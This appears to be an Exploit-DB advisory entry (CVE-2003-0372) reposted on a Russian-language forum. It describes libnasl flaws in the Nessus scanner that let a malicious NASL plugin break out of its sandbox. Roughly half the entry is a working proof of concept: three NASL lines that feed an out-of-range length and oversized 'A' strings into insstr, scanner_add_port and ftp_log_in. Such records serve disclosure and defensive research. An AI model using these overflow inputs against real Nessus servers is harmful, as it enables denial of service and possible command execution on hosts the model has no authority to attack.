- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22634
- Проверка EDB
-
- Пройдено
- Автор
- SIR MORDRED
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- cve-2003-0372
- Дата публикации
- 2003-05-22
Код:
source: https://www.securityfocus.com/bid/7664/info
Nessus has reported that various flaws have been discovered in the 'libnasl' library used by the Nessus application. As a result, a malicious NASL script may be able to break outside of the established sandbox environment and execute arbitrary commands on the local system.
Note that this malicious script must be a legitimate plugin that has been uploaded to the Nessus server. Furthermore, the affected Nessus application must have enabled the 'plugins_upload' option (which is disabled by default).
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
ftp_log_in (socket : open_sock_tcp(21), pass : "11", user:crap (data:'A',length:8192) );- Источник
- www.exploit-db.com
